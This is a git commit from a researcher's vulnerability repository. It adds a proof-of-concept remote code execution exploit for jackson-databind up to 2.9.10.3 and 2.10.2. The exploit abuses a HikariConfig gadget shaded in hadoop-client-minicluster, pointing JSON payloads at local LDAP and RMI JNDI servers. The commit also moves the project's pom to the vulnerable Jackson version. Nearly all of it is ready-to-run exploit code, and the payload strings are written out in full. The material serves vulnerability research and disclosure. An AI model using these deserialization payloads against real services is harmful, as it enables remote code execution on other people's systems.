feat:jackson新gadget（hadoop）

threedr3am · threedr3am · commit 0ccd82e3526e · 2020-02-29T14:30:58.000+08:00
diff --git a/jackson/pom.xml b/jackson/pom.xml
@@ -16,10 +16,12 @@
 <!--    <jackson.version>2.9.9.1</jackson.version>-->
 
     <!--     CVE-2019-20330-->
-        <jackson.version>2.9.10.1</jackson.version>
+<!--        <jackson.version>2.9.10.1</jackson.version>-->
 
     <!--     CVE-2020-8840-->
     <!--    <jackson.version>2.10.2</jackson.version>-->
+
+        <jackson.version>2.9.10.3</jackson.version>
   </properties>
 
   <dependencies>
@@ -77,7 +79,21 @@
     <dependency>
       <groupId>javax</groupId>
       <artifactId>javaee-api</artifactId>
-      <version>6.0</version>
+      <version>8.0.1</version>
+    </dependency>
+
+    <!-- https://mvnrepository.com/artifact/hikari-cp/hikari-cp -->
+    <dependency>
+      <groupId>com.zaxxer</groupId>
+      <artifactId>HikariCP</artifactId>
+      <version>3.4.1</version>
+    </dependency>
+
+    <!-- https://mvnrepository.com/artifact/org.apache.hadoop/hadoop-client-minicluster -->
+    <dependency>
+      <groupId>org.apache.hadoop</groupId>
+      <artifactId>hadoop-client-minicluster</artifactId>
+      <version>3.2.1</version>
     </dependency>
   </dependencies>
 
diff --git a/jackson/src/main/java/com/threedr3am/bug/jackson/HadoopHikariConfigPoc.java b/jackson/src/main/java/com/threedr3am/bug/jackson/HadoopHikariConfigPoc.java
@@ -0,0 +1,42 @@
+package com.threedr3am.bug.jackson;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ *
+ * jackson-databind <= 2.9.10.3 and <= 2.10.2 RCE，需要开启DefaultType (reported by threedr3am to the authorities)
+ *
+ * <dependency>
+ *       <groupId>org.apache.hadoop</groupId>
+ *       <artifactId>hadoop-client-minicluster</artifactId>
+ *       <version>3.2.1</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class HadoopHikariConfigPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+//    String json = "[\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"rmi://localhost:43657/Calc\"}]";
+    String json = "[\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\", {\"metricRegistry\":\"ldap://localhost:43658/Calc\"}]";
+//    String json2 = "[\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\", {\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}]";
+    String json2 = "[\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\", {\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}]";
+    mapper.readValue(json, Object.class);
+  }
+}
diff --git a/jackson/src/main/java/com/threedr3am/bug/jackson/JndiConverterPoc.java b/jackson/src/main/java/com/threedr3am/bug/jackson/JndiConverterPoc.java
@@ -6,7 +6,7 @@
 
 /**
  *
- * jackson-databind <= 2.10.2 RCE，需要开启DefaultType
+ * jackson-databind <= 2.10.2 RCE，需要开启DefaultType (reported by threedr3am to the authorities)
  *
  * CVE-2020-8840
  *

Original file line number	Diff line number	Diff line change
`@@ -6,7 +6,7 @@`
`6`	`6`
`7`	`7`	`/**`
`8`	`8`	`*`
`9`		`- * jackson-databind <= 2.10.2 RCE，需要开启DefaultType`
	`9`	`+ * jackson-databind <= 2.10.2 RCE，需要开启DefaultType (reported by threedr3am to the authorities)`
`10`	`10`	`*`
`11`	`11`	`* CVE-2020-8840`
`12`	`12`	`*`